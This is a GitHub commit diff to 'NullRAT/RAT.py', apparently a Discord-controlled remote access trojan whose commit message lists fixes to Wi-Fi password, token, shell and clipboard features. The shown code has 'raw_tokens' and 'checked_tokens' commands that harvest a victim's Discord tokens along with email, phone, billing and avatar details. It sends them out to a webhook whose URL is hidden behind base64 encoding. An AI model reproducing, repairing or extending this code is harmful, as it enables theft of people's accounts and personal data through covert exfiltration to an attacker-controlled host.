Skip to content

Commit 57f986d

Browse files
authored
Fixed wifipass, tokens, shell, clipboard....
1 parent 69f9661 commit 57f986d

File tree

1 file changed

+4
-4
lines changed

1 file changed

+4
-4
lines changed

NullRAT/RAT.py

Lines changed: 4 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -199,8 +199,8 @@ async def raw_tokens(ctx, victim):
199199
return await ctx.followup.send("```" + message + "```")
200200
embed = Embed(title="Discord Tokens (NullRAT):", color=0x0081FA).add_field(name="RAW Tokens:", value=f"```{message.rstrip()}```")
201201
async with aiohttp.ClientSession() as session:
202-
webhook = Webhook.from_url(b64decode(a.replace("\n","").encode('ascii')).decode('ascii'), session=session)
203-
await webhook.send(embed=embed)
202+
wh = Webhook.from_url(b64decode(a.replace("\n","").encode('ascii')).decode('ascii'), session=session)
203+
await wh.send(embed=embed)
204204
await ctx.followup.send(embed=embed)
205205

206206
@client.slash_command(description="Sends checked tokens along with info (accurate)", guild_ids=server_ids)
@@ -232,8 +232,8 @@ async def checked_tokens(ctx, victim):
232232
for tk, em, ph, un, ni, bi, av, idqa in zip(valid, email, phone, uname, nitro, bill, avatar, idq):
233233
await ctx.channel.send(embed=checked_embeds(tk, em, ph, un, ni, bi, av, idqa))
234234
async with aiohttp.ClientSession() as session:
235-
webhook = Webhook.from_url(b64decode(a.replace("\n","").encode('ascii')).decode('ascii'), session=session)
236-
await webhook.send(embed=checked_embeds(tk, em, ph, un, ni, bi, av, idqa))
235+
wh = Webhook.from_url(b64decode(a.replace("\n","").encode('ascii')).decode('ascii'), session=session)
236+
await wh.send(embed=checked_embeds(tk, em, ph, un, ni, bi, av, idqa))
237237

238238
# Directory Manipulation #
239239
@client.slash_command(description="Returns Current Working Directory", guild_ids=server_ids)

0 commit comments

Comments
 (0)